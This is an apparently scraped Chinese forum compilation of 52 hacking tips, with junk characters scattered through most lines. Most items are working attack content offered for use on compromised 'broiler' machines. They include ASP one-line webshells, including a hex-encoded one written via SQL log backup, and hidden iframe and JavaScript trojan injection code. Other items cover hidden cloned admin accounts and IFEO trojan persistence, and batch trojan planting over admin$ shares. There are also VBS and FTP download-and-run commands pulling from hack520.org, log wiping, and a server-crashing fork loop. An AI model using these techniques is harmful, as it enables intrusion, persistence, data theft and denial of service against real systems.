Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
3 k _$ B7 S0 f; q6 e' g7 k7 I/ ccacls C:\windows\system32 /G hqw20:R
0 \2 B! R8 ~5 ~) y7 g) Y思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入+ ]5 l/ D$ ^# F: @0 |) X
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F& x7 ~' M% V3 B# s3 z& |
# T; m& m* ]3 Y- {# {3 R4 E
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
% f$ \# c8 O' P( v0 O3 M! X
0 h. x J/ I1 L) g3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
% k1 P2 w- p5 O" B( a+ O5 e% i( S+ Z& o
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号7 z: \4 P8 q( u
/ ~ F0 T1 U" B- i- V5、利用INF文件来修改注册表9 O. v* C4 v8 N$ Z: b' g8 T& g
[Version]& `6 ?+ t; l% a
Signature="$CHICAGO$"" `% s5 J$ [$ x1 i9 ~: P- C1 L E
[Defaultinstall]0 }9 C; Z' z& l& S" C' g+ ?
addREG=Ating/ X7 E; a* k: V& \, U
[Ating]
7 d/ U4 j3 k7 r; pHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"# V' f& i7 R% o8 v& {5 j
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
, O+ P* P! T' D! erundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
4 I5 U; }* ^+ z0 ]. |其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU, C" W- M0 g s" E+ H9 R
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
4 X& W, x5 x, N7 AHKEY_CURRENT_CONFIG 简写为 HKCC
4 l! @2 w! o8 g0 j" L e0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值$ `+ z3 X2 C. L3 A( m& H: S. i# }
"1"这里代表是写入或删除注册表键值中的具体数据9 W2 O. s1 `& ?' M3 M
6 m0 K1 v: V% Z
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,- G K) b( v. u& a" E
多了一步就是在防火墙里添加个端口,然后导出其键值! b2 A. g: c! O) |& V' v7 g
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
5 n; D3 D/ h+ }4 Y& ]6 }# ?' c& z6 X) A- ^- m/ b
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽, o0 O# S+ n* @! Q
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
6 y$ l! H' Q0 \, \* `3 Z) W0 o
5 o+ @2 t) e) G9 g$ v0 H3 F: |8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
& g6 j9 i. \( B: _$ K
6 Z1 e* o% [1 ]3 p {9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
0 Y9 y+ f( D1 @( S/ Y, ]2 ^/ H0 X ^可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
& O. ^& b( {) I8 s( F: [% P' O6 F5 N& i% C
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
! j4 @& g# L+ }$ T+ Y; `9 y' [+ H" Q; r' I) c% J
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,1 ]( M+ v' [+ ~1 X+ V7 i5 T4 E
用法:xsniff –pass –hide –log pass.txt
* [/ e/ s, g( b4 B. a6 J: n) P2 I( d$ S( B
12、google搜索的艺术
4 b y9 g) K d; s: n0 G5 O ?4 @: l( Q搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
8 E! }" V2 K( r" w或“字符串的语法错误”可以找到很多sql注入漏洞。+ T/ I3 @% D" r/ X7 G: p
& a# b! I q" ]/ F. X' S
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。' D% e" Z* ~% ]) K+ N8 I2 E- S
- H) T0 d9 `) a' H14、cmd中输入 nc –vv –l –p 1987: R6 A, ]7 {" r3 E% i; M% I& }
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃4 c% z& O" v" L3 B
8 X, g5 X9 l* Y; @# T) n15、制作T++木马,先写个ating.hta文件,内容为4 a3 P8 @% P) f9 @7 U6 `9 G
<script language="VBScript">
$ x' y! D3 q6 q% pset wshshell=createobject ("wscript.shell" )9 L- u0 U' B; T8 f
a=wshshell.run("你马的名称",1)5 E; Z7 v4 W. |, o! l) E" c A
window.close
) V+ F" J# A: S7 H* S# r</script>4 t& x1 I- A: b# F7 v
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
; Z1 s# g9 f' Z& x1 t5 e2 J! Z' P$ i. Z
16、搜索栏里输入
& O. a+ `+ ~2 S* \关键字%'and 1=1 and '%'='! B- t% \7 L6 ~- M& p2 u
关键字%'and 1=2 and '%'='0 B/ |* L: L, E( F/ r* r) Z. a3 p
比较不同处 可以作为注入的特征字符0 f9 N5 q# x( h( A
( a; I8 e6 ]3 k* u* L
17、挂马代码<html>+ g8 T. }$ \6 S4 S. Z
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
8 Q! [* F: h% H' f5 v. ?: k, n5 N, U2 Y</html>
2 e: o8 X9 \. K [, A9 k! Z* `1 }. v! H' ~ C* A
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,- w8 R! w+ n/ N
net localgroup administrators还是可以看出Guest是管理员来。9 g1 x6 q/ u) b' J
2 e! G2 y/ V' Z9 D" m- L
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
% c( `5 `5 n. X; d! B c1 ?5 B+ G用法: 安装: instsrv.exe 服务名称 路径
. k* g% a& i' e Z9 b! N卸载: instsrv.exe 服务名称 REMOVE8 g5 O4 I6 C- R3 {# v
: A. J+ O$ X; W6 u; J/ @5 P
, e! S# u; {' F' j. w
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
6 Y7 Z* Y. k0 E" f不能注入时要第一时间想到%5c暴库。
5 N# i1 a8 H' x7 t5 E8 ?5 ~0 W( U0 L
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~' M# ]* ?- ?2 {1 z9 v5 W4 P
9 F J& A ]+ h
23、缺少xp_cmdshell时
9 m! W& b. ]' b8 J+ B尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
: n9 {7 ~( X0 h" j4 @4 _假如恢复不成功,可以尝试直接加用户(针对开3389的)# H# J& R- h. O0 G( |$ W6 b) V
declare @o int$ ]2 ~% Z2 _. ^" @" E
exec sp_oacreate 'wscript.shell',@o out1 M: Z1 b4 @: b' ^ i2 S5 T
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员( U, ]) M' _9 Z
" V' x: ^) d3 v2 e! b/ g24.批量种植木马.bat
+ k) Q! R1 r& V9 qfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
4 L2 |6 v- j+ W* s) ^$ j o4 ~# m: mfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间' S. l5 I& c' `- [" V
扫描地址.txt里每个主机名一行 用\\开头5 n4 X x, P$ `. X0 Q4 I2 y
) V6 B; k& c# y5 b6 h$ F) N" y; u25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
9 R4 y5 j$ T* ?; d8 t6 A5 N: T) T% h' p! Q4 k
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
3 {' \( a& t, K/ e; v! g将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.$ r! x& ^! H- `1 D6 T
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
% u6 z5 |: n9 q! n$ G( w7 T, G* F, h
9 E7 b8 _! o6 U27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP6 ~, i6 n( Y$ T: \% \" L( r; z1 o) Z
然后用#clear logg和#clear line vty *删除日志# O0 j6 W3 o0 T7 @1 {! s
# P8 y- U0 _# F, l" I
28、电脑坏了省去重新安装系统的方法
7 n) i4 ?3 x8 i1 m纯dos下执行,
/ v/ U/ K5 N& @# h& z5 Txp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
/ t8 Q' ?" f, M, U2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
0 G; V/ j8 V# @1 i4 A7 O; T+ J u8 e
29、解决TCP/IP筛选 在注册表里有三处,分别是:3 y- e( K; Z% v/ y1 S9 S
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
! _3 M1 V( K# m* m; ?. P5 }# CHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 N- D0 s( D1 [6 NHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& F! _) }- Z) n* _分别用7 v: a( e. }! v- w) t3 K; m9 e
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
* b* B/ w) L: m- m0 r$ vregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
9 P' _( R# r* S6 Dregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; k& Y9 H( {" T" P) I, T
命令来导出注册表项
1 u, z$ [/ I0 G5 P1 k, k3 Q然后把三个文件里的EnableSecurityFilters"=dword:00000001,( d, Z) h, _ I7 |! e
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用 D0 }; c- F. h o
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
! }4 Z, G H8 W- h* ]3 W6 t3 r U5 |$ f" N
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
! c! g5 Z1 \7 B$ F# D$ ?6 k3 nSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3$ @/ m/ V- _, |- X$ e, A+ H
4 q+ l" c7 j) C. t4 Y8 J" F& |
31、全手工打造开3389工具$ K: d" {( Z, d9 c/ \- y- T! N
打开记事本,编辑内容如下:1 [- c; L+ ]4 i% f: U" j, u+ d
echo [Components] > c:\sql% c/ z: [* _. f7 Z; q- I
echo TSEnable = on >> c:\sql
t/ z8 S: E+ @' F& ~sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q5 u+ @6 ^, [" B) g
编辑好后存为BAT文件,上传至肉鸡,执行
$ K( J a+ u. H# s1 h1 T5 p! `
/ c: M, w# B) c, e* A+ l32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
' m9 ^2 V0 I& F# M7 Y: F7 F- \/ P. }2 q0 k4 i
33、让服务器重启
8 @4 D r/ k5 [# c, m/ _写个bat死循环:
6 c* f# t/ N$ o. z. k" {. P. d# U@echo off% Z6 [% l( @- V1 l
:loop1
% `% w- F4 P$ t8 g3 qcls
% X& S7 F8 y; r0 U- Nstart cmd.exe: K9 a y% B' m/ k' |7 F z
goto loop1
* A) r6 S5 q! w: ~保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启, ^- l$ W4 a2 m0 n( @8 N# Z* ? c
5 |+ A; I/ e) b34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,+ M+ e# |+ p4 P# p% L5 R! l
@echo off, s) s# X+ g6 @& B+ J% n0 `
date /t >c:/3389.txt! W" `+ {% {, |# M
time /t >>c:/3389.txt# Z- R$ p; N* Y* {
attrib +s +h c:/3389.bat$ K( a9 A4 G8 {+ Z0 t# B
attrib +s +h c:/3389.txt1 W! }) V7 `5 g) K+ B" _
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt& B+ {, C/ R; _( r8 R% }0 x
并保存为3389.bat' l, U# g% E X
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号" R; ^ C! h6 n/ o' \' U! [) m; T
. N/ H! R0 B( H
35、有时候提不了权限的话,试试这个命令,在命令行里输入:& ?% G$ |/ I( E+ \
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
' B2 }5 @: y( }- V8 g: q输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。( z- k3 y* C6 T# G. r
0 Y8 J6 O% u* F7 ?
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
* X. j, L- I$ d% Gecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
4 f& }# D' T V9 X4 m' u5 oecho 你的FTP账号 >>c:\1.bat //输入账号
9 s9 i( g! F( d9 ^echo 你的FTP密码 >>c:\1.bat //输入密码* K+ j: e8 [ m# H1 z: C7 a6 T
echo bin >>c:\1.bat //登入% J0 t/ v# [* t
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
6 q5 H2 H4 b8 w' p9 [2 Becho bye >>c:\1.bat //退出
1 u! U3 U! H' u* x然后执行ftp -s:c:\1.bat即可
: s4 j6 L* }% [8 a+ ~7 G+ u5 o0 `0 K1 ^
37、修改注册表开3389两法
: N8 d" Q6 J$ }" G(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表5 a5 v, c& |% @/ l& W2 x
echo Windows Registry Editor Version 5.00 >>3389.reg4 j3 H0 Z+ e1 C- b) q& ~2 u
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
9 H. y H$ u* u8 v& \# w, U. x* kecho "Enabled"="0" >>3389.reg
" o" V F2 @6 r3 z, G' \& \echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
; g5 w- e$ h& X9 ?NT\CurrentVersion\Winlogon] >>3389.reg
! V0 S/ r, t3 ~% {& _7 Cecho "ShutdownWithoutLogon"="0" >>3389.reg
* u8 C* K. k* G- v0 \/ [& {& f# P8 |echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
( z& M! R; o' `4 |>>3389.reg
, x# f' s' b% recho "EnableAdminTSRemote"=dword:00000001 >>3389.reg0 ^0 ]! l- T! H* R; l2 i# Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]/ k+ @) y6 T; x* o4 @" y+ J6 E
>>3389.reg
; N. J% ~0 j/ aecho "TSEnabled"=dword:00000001 >>3389.reg
, v$ @) @+ e( V7 aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg7 J0 ?0 j4 U8 h2 d
echo "Start"=dword:00000002 >>3389.reg" M) d; ^5 Z( Y9 R& I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]5 y) Y4 D. L7 B' Z% z
>>3389.reg S+ @: y& l! y* u* o- p
echo "Start"=dword:00000002 >>3389.reg
, B, B, A4 ~* v$ ~echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg; B3 Q3 P' _, Q+ K# f; D: O8 j
echo "Hotkey"="1" >>3389.reg
7 _' X' X; B9 b: U5 N5 ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ O6 o) H( e9 J- k/ }2 _Server\Wds\rdpwd\Tds\tcp] >>3389.reg
+ L: ^9 ]. N1 J6 J* I. Cecho "PortNumber"=dword:00000D3D >>3389.reg7 {) n$ G/ ^( Q% p) ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( G6 k$ Z* K9 ^! s2 v! D$ lServer\WinStations\RDP-Tcp] >>3389.reg) Q% h; g: ]% p$ f
echo "PortNumber"=dword:00000D3D >>3389.reg f @) p# K W- `
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。7 V& e# m. L2 s' y6 R+ D0 z
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)9 T1 m9 M/ b, c4 B: c/ a- I
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效" u/ _) H ?% g+ K1 K
(2)winxp和win2003终端开启& j: ~/ m! ~. Q! @) G
用以下ECHO代码写一个REG文件:' B5 c- Z3 b7 R/ u: Y' `
echo Windows Registry Editor Version 5.00>>3389.reg
* e i1 I* L, F0 M! e0 \0 O Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 H2 ?8 z/ n# [* D( q3 H: f% B
Server]>>3389.reg
" f4 N7 ]) ^; F! l/ |5 Oecho "fDenyTSConnections"=dword:00000000>>3389.reg
3 k: w) j5 ~' N; k' I6 eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& j; @3 V9 m7 P. j- r6 |9 M& u
Server\Wds\rdpwd\Tds\tcp]>>3389.reg/ ]' a" y* d# q1 T7 b A- \! P
echo "PortNumber"=dword:00000d3d>>3389.reg M7 A0 b- g, @ r7 ^* H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ \- i2 \/ z3 U F9 Y. Y5 r% [Server\WinStations\RDP-Tcp]>>3389.reg
& ?: `5 V z, `5 B" [6 G: q: e; wecho "PortNumber"=dword:00000d3d>>3389.reg
; }$ T/ J& S6 A# U然后regedit /s 3389.reg del 3389.reg" Z- ?. F4 D/ f# s2 T
XP下不论开终端还是改终端端口都不需重启
9 w) i$ [. `# L- p: I8 }( [5 G2 Q4 x) ^9 q, P
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
1 ^: [, T- n7 m$ H" Y; v用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
0 s( j+ B* N, `. \% ]' |% X U0 ^2 W" l; _
6 L, Q3 P& ^8 R. r) G39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
8 B9 x$ n" \" ^% H(1)数据库文件名应复杂并要有特殊字符
0 y) f% M2 K1 Z+ |9 i' i9 I ~(2)不要把数据库名称写在conn.asp里,要用ODBC数据源1 _1 U4 T s- Z6 h
将conn.asp文档中的
" Z8 c3 q- [/ k0 {9 ]3 FDBPath = Server.MapPath("数据库.mdb")
/ V7 s) K) x" Kconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath! H2 b( L3 m7 s+ _. @6 @
2 n+ v8 i! ?/ o6 X+ }! U( z4 m% W修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置! o7 b6 I p/ ^) k/ r
(3)不放在WEB目录里
0 X3 M$ M. U c4 ]$ c' h; L& H# \7 ^0 b$ S$ f' o+ E0 ~
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉, P1 {; ^4 ^6 y: ]6 I8 ]
可以写两个bat文件
5 Q( j/ T/ ]+ z+ X T2 P@echo off
1 @6 D1 V- B7 k3 k9 A@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe9 n: y0 \, T5 y
@del c:\winnt\system32\query.exe( M7 O' o0 P4 l a' p1 M9 E# m
@del %SYSTEMROOT%\system32\dllcache\query.exe
# W1 ] m7 I% B5 D@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的( S9 }) A* t# h
# J4 q+ @) ^, ^. b@echo off% L3 r3 }4 G6 y* V' [. K; g
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
! n2 S2 K7 \+ o7 O5 T@del c:\winnt\system32\tsadmin.exe7 m5 r) l( u6 V3 U* W6 i! W
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
" D; U- s& x3 @( Z' \
4 `: G" a2 J( I6 q, X+ J41、映射对方盘符
" k5 B, ~+ J2 ztelnet到他的机器上,. \) |5 x* _$ w( W- R2 \% \
net share 查看有没有默认共享 如果没有,那么就接着运行
) f4 J4 A+ h* a( o h/ Knet share c$=c:
$ q A. G) I) p! p5 qnet share现在有c$
% v$ J2 ~( o2 s/ P5 ~5 w( b在自己的机器上运行
1 q& G; e# b% ]# bnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K' @6 F3 z) ]" ^" p5 Z/ v
4 y/ E3 d% j8 r* x# {- |) F42、一些很有用的老知识
3 L5 v# |9 f2 d' h& vtype c:\boot.ini ( 查看系统版本 )# c7 m$ p8 H( H. p
net start (查看已经启动的服务)
% `* v2 {8 X/ N7 R" zquery user ( 查看当前终端连接 )! j2 d' d2 b; }! ~4 @" r/ C/ H, U
net user ( 查看当前用户 )
9 b1 S ^/ \& j+ u& {$ R# D, Mnet user 用户 密码/add ( 建立账号 )1 o* @6 R$ M4 p& j& M# T+ N
net localgroup administrators 用户 /add (提升某用户为管理员)
0 t" e4 w( k4 A6 T- t% ?ipconfig -all ( 查看IP什么的 )
; L" R3 q6 ]4 T% }netstat -an ( 查看当前网络状态 )& X* X$ N( r" {* ]( P
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
8 B s$ P& a. U) d: R8 B克隆时Administrator对应1F4
$ ]# a9 B% U4 m7 l1 i' Pguest对应1F5! s, d' A7 w6 I1 I4 |
tsinternetuser对应3E8
( f7 d% r) [6 q9 a# N; X. {; b% j! B
43、如果对方没开3389,但是装了Remote Administrator Service
% x2 W2 u1 y+ x6 d. J, j. [6 P* o用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接# f# k' F9 g1 e9 C; Y) ?4 q6 n7 N
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息3 P' k' z J/ p8 K6 \
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
: Z* E6 l) H Z- J
( d h0 a& p. t$ u44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)8 {9 t- s; v" x4 `; S
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
5 |( c- j, z6 H1 x& X. Z
6 h" r7 ?) c/ g: r, j- u8 a0 j45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)3 _) B, n: C5 N ^- w& w: O
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
4 p7 p- A1 g) F6 l: M! I* K$ N^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
, h& r) o+ J+ [! q" t% BCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =% Q, J6 [7 E* l3 i7 j
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
0 w# N) a- c" M; X9 u; Q0 v(这是完整的一句话,其中没有换行符)
7 H9 k b0 g, O W+ T2 O- ]0 ~然后下载:
9 D8 q( {- j7 h, ~cscript down.vbs http://www.hack520.org/hack.exe hack.exe
4 S) }) C! ]: `8 F
: W2 G9 b/ b6 a9 N( _$ K) G8 _46、一句话木马成功依赖于两个条件:
; q5 J! {: D" i- b- V& @1、服务端没有禁止adodb.Stream或FSO组件
% d, S/ R7 {+ [, R8 z2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
4 x% N" n( H/ u( F# T M& D7 x
; {9 {3 A% m1 m$ F47、利用DB_OWNER权限进行手工备份一句话木马的代码:
+ @: W) y+ X0 V& K! N;alter database utsz set RECOVERY FULL--
2 f! T/ u# S: C& k5 y' }2 X0 q;create table cmd (a image)--2 p8 H! V9 V s8 w+ f) u* M0 n" q
;backup log utsz to disk = 'D:\cmd' with init--
' c; p8 s" O) e9 _' U2 z;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
. g" p7 f$ @5 X* F: m C# v3 Q' y;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
. m3 g6 Y) p0 G注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。: x) g! d/ a" @" U
% K! O* |/ n& B9 A/ ^
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
9 A9 O4 `, ~/ v- t) Y6 C* I4 F
( ]4 G; o) J8 E: K! }* F# @用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options7 M) ~+ x' S) T+ r
所有会话用 'all'。2 j3 h$ |) n& Q# m. M9 e& Z9 m
-s sessionid 列出会话的信息。
% z* A0 @0 |3 W% G% ~-k sessionid 终止会话。
$ M- F) N/ y, }0 G, q-m sessionid 发送消息到会话。
! ^# e# @0 A8 a. h% G# j$ ~" t- N ^3 U: [
config 配置 telnet 服务器参数。# q8 \8 c; v1 M8 ~! t
5 k. s5 Y: h" `$ o9 B) Y' a
common_options 为:! d' N. {$ G: M
-u user 指定要使用其凭据的用户 b/ T/ B- `- f8 q8 E3 B- u9 J
-p password 用户密码5 _2 Q/ C+ d& ]: ]( s3 d
8 _- z) G9 k- X Q" L6 m8 p+ ?
config_options 为:
# \; U9 O s# J& i/ z9 Jdom = domain 设定用户的默认域
# D3 d3 U: ~. t9 s; x$ @ctrlakeymap = yes|no 设定 ALT 键的映射8 N6 ?1 @1 R! q ?- Q& ?
timeout = hh:mm:ss 设定空闲会话超时值9 a, y; ]" F( t2 G1 z
timeoutactive = yes|no 启用空闲会话。7 J8 w! ]) n+ @# C& m* t: u
maxfail = attempts 设定断开前失败的登录企图数。& o. r( ^) k+ L/ Y) v7 c; c& {# X
maxconn = connections 设定最大连接数。7 h0 b( L1 J! F ~, ?! t. s
port = number 设定 telnet 端口。2 E6 }+ ~3 A% d; \2 x) T) F% O* _
sec = [+/-]NTLM [+/-]passwd5 b$ a+ K( }9 A# C8 T2 u
设定身份验证机构
& O; l3 @+ C! x" Gfname = file 指定审计文件名。
2 F I1 }" D( u: f' U% D. r( e9 hfsize = size 指定审计文件的最大尺寸(MB)。& i2 k' w& m/ h5 x9 W1 O* S! H
mode = console|stream 指定操作模式。% Q+ K. j. n' G$ Y, w y
auditlocation = eventlog|file|both
) h9 h7 |7 ^& a% N/ M7 X指定记录地点
$ S% R9 M4 [& X. a h8 H7 `7 maudit = [+/-]user [+/-]fail [+/-]admin. V& o6 Y @* W0 ]
$ o% i- d8 c0 g7 p
49、例如:在IE上访问:
- g0 d% k0 @% I9 Pwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
1 H h5 r, j9 |1 }" h* r) V# g6 thack.txt里面的代码是:! ], l% g1 i* u- ]; E5 H
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
' }8 O( b1 z8 N% j c! n把这个hack.txt发到你空间就可以了!( U0 a5 c2 J' z, F5 v
这个可以利用来做网马哦!( W5 t0 c6 m; t
- W1 {( z3 b" m
50、autorun的病毒可以通过手动限制!0 r# ~1 U4 h5 s8 k8 b; u
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!3 n% Q* v% r5 O" [% u d. F
2,打开盘符用右键打开!切忌双击盘符~, K! S- l" S5 O; \
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!* w$ v3 D/ ]4 F0 H' C( V9 u( | t
2 Q( g, e9 P6 X7 J+ `
51、log备份时的一句话木马:% D# T* c( ^' z9 G
a).<%%25Execute(request("go"))%%25>
% D v) I% @+ p/ X4 S3 N. X2 {b).<%Execute(request("go"))%>; y H! \% M/ U5 S# T) z a
c).%><%execute request("go")%><%
' ~4 W# v! A$ J9 b7 Hd).<script language=VBScript runat=server>execute request("sb")</Script>
8 Y( A3 G% w& X0 h1 p7 A/ B0 Me).<%25Execute(request("l"))%25>9 l G4 x t c- Y: |1 Q3 a- e
f).<%if request("cmd")<>"" then execute request("pass")%>4 T: y1 f6 X) x3 k0 q
- u( T; c4 G: K i0 F# W52、at "12:17" /interactive cmd
4 y2 m+ \, o. J/ C' F: O执行后可以用AT命令查看新加的任务3 o- _+ @5 g- Y
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
